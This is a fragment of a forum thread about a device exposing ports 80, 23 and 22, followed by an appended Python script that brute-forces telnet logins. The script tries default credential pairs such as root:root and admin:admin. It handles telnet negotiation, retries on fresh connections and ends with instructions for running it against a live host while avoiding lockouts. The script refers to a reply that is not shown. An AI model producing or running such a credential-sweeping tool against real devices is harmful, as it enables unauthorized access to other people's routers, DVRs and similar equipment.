> ports by default (80.23,22), we found a DoS over port 80...
>
> any1 with more information?
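The default-credential check suggested in the reply above, as an added example that is not part of the original post: a small telnet credential sweep in Python. The four user:password pairs are the ones the reply names; the login, password and shell prompt patterns, the `FakeTelnet` in-memory target used to exercise the loop offline, and the function names are this example's own assumptions. It opens a fresh connection for every attempt (embedded telnet daemons commonly drop the session after one failed login) and answers telnet option negotiation with refusals so the stream stays plain text. The SSH half of the suggestion needs an SSH client library such as paramiko driving the same credential list and is not shown.

```python
"""Telnet default-credential sweep. Added example; see the lead-in for what is assumed."""
import re
import socket

# Credential pairs named in the reply, in the order suggested.
DEFAULT_CREDS = [("root", "root"), ("root", "admin"), ("admin", "admin"), ("radmin", "radmin")]

# Telnet command bytes (RFC 854) needed to refuse option negotiation.
IAC, DONT, DO, WONT, WILL = 255, 254, 253, 252, 251

# Prompt patterns are assumptions; adjust to the banner the device actually prints.
LOGIN_RE = re.compile(rb"(login|username|user)\s*:\s*$", re.I)
PASS_RE = re.compile(rb"password\s*:\s*$", re.I)
SHELL_RE = re.compile(rb"[#$>]\s*$")
FAIL_RE = re.compile(rb"(incorrect|failed|invalid|denied)", re.I)


def strip_iac(data: bytes, conn) -> bytes:
    """Drop IAC sequences from `data`, answering DO with WONT and WILL with DONT
    so the server stops negotiating and the remaining bytes are plain text."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] != IAC:
            out.append(data[i]); i += 1
        elif i + 1 < len(data) and data[i + 1] == IAC:      # escaped 0xFF data byte
            out.append(IAC); i += 2
        elif i + 2 < len(data) and data[i + 1] in (DO, DONT, WILL, WONT):
            if data[i + 1] in (DO, WILL):
                conn.sendall(bytes([IAC, WONT if data[i + 1] == DO else DONT, data[i + 2]]))
            i += 3
        else:                                                # other 2-byte command or truncated
            i += 2
    return bytes(out)


def try_login(conn, user: str, password: str, max_reads: int = 20) -> bool:
    """Drive one login dialog over `conn` (anything with recv()/sendall()).
    True when a shell prompt follows the credentials; False on a failure
    message, a re-shown login prompt, a closed connection or a timeout."""
    buf, stage = b"", "login"
    for _ in range(max_reads):
        try:
            chunk = conn.recv(4096)
        except (socket.timeout, OSError):
            return False
        if not chunk:
            return False
        buf += strip_iac(chunk, conn)
        tail = buf[-256:]
        if stage != "result" and PASS_RE.search(tail):      # some devices skip the username
            conn.sendall(password.encode() + b"\r\n"); stage, buf = "result", b""
        elif stage == "login" and LOGIN_RE.search(tail):
            conn.sendall(user.encode() + b"\r\n"); stage, buf = "password", b""
        elif stage == "result":
            if FAIL_RE.search(tail) or LOGIN_RE.search(tail):
                return False
            if SHELL_RE.search(tail):
                return True
    return False


def sweep(conn_factory, creds=DEFAULT_CREDS):
    """Try each pair on a fresh connection, since embedded telnet daemons often
    drop the session after one failed login. Returns the first working pair or None."""
    for user, password in creds:
        conn = conn_factory()
        try:
            if try_login(conn, user, password):
                return (user, password)
        finally:
            conn.close()
    return None


def tcp_factory(host: str, port: int = 23, timeout: float = 5.0):
    """Connection factory for a real target; only for systems you are authorized to test."""
    return lambda: socket.create_connection((host, port), timeout=timeout)


class FakeTelnet:
    """Constructed in-memory target for running the sweep offline: sends a DO ECHO
    negotiation first, then accepts exactly one username/password pair."""
    def __init__(self, valid=("admin", "admin")):
        self.valid, self.user, self.sent = valid, None, []
        self.script = [bytes([IAC, DO, 1]) + b"\r\nDVR login: "]

    def recv(self, n):
        return self.script.pop(0) if self.script else b""

    def sendall(self, data):
        self.sent.append(data)
        if data[:1] == bytes([IAC]):                         # negotiation reply, not a login line
            return
        line = data.rstrip(b"\r\n").decode()
        if self.user is None:
            self.user = line
            self.script.append(b"Password: ")
        elif (self.user, line) == self.valid:
            self.script.append(b"\r\n# ")
        else:
            self.script.append(b"\r\nLogin incorrect\r\nDVR login: ")

    def close(self):
        pass


if __name__ == "__main__":
    print("offline demo:", sweep(lambda: FakeTelnet(("admin", "admin"))))
```

Against a live box, `sweep(tcp_factory("192.0.2.10"))` runs the same loop over TCP; keep the list short and the attempts sequential, since some of these devices lock the account or wedge the telnet daemon after a handful of failures.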
